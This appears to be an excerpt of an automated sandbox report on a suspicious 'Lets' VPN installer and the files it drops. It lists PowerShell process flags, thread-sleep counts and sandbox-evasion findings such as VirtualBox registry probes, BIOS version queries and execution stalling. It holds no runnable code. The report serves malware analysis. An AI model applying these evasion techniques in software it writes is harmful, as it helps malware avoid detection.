                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\ProgramData\Program\iusb3mon.exe Stalling execution: Execution stalls by calling Sleep (graph_28-35518)
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe System information queried: FirmwareTableInformation (2 entries)
                              Source: C:\ProgramData\Program\iusb3mon.exe System information queried: FirmwareTableInformation (2 entries)
                              Source: C:\ProgramData\Program\iusb3mon.exe Section loaded: OutputDebugStringW count: 275
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Section loaded: OutputDebugStringW count: 1926
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\Program\iusb3mon.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\Program\iusb3mon.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\ProgramData\Program\iusb3mon.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\ProgramData\Program\iusb3mon.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (67 entries)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (14 entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6122
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2172
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4179
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2169
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5577
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 363
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3924
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3058
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3925
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 677
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Window / User API: threadDelayed 394
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe Window / User API: threadDelayed 8360
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 703
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2688
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3445
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1510
                              Source: C:\ProgramData\Program\iusb3mon.exe Window / User API: threadDelayed 2027
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5301
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 508
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3436
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3347
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2932
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 780
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5731
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3974
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 818
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3632
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4915
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4394
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4186
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1660
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5548
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 786
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5408
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4618
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 695
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3497
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4623
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 979
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1014
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 904
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1006
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 772
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1207
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 826
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 960
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 833
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 373
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 739
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 799
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 900
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 803
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 451
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 821
                              Source: C:\ProgramData\Program\iusb3mon.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_28-35483
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeDropped PE file which has not been started: C:\Program Files\product1\letsvpn-latest.exeJump to dropped file
                              Source: C:\ProgramData\Program\iusb3mon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_28-35451
                              Source: C:\Users\user\Desktop\Lets-x64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-3248
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeAPI coverage: 5.3 %
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe TID: 1848 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep count: 4179 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep count: 2169 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 4824 Thread sleep count: 209 > 30
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 4824 Thread sleep time: -41800s >= -30000s
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 3012 Thread sleep count: 161 > 30
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 3012 Thread sleep time: -32200s >= -30000s
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628 Thread sleep count: 394 > 30
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628 Thread sleep time: -1182000s >= -30000s
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628 Thread sleep count: 8360 > 30
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628 Thread sleep time: -25080000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012 Thread sleep count: 703 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044 Thread sleep count: 3445 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 7276 Thread sleep time: -121620s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 8004 Thread sleep time: -83000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7568 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3304 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep count: 5301 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep count: 508 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep count: 3436 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep count: 3347 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7408 Thread sleep count: 334 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 5731 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352 Thread sleep count: 3974 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep count: 818 > 30
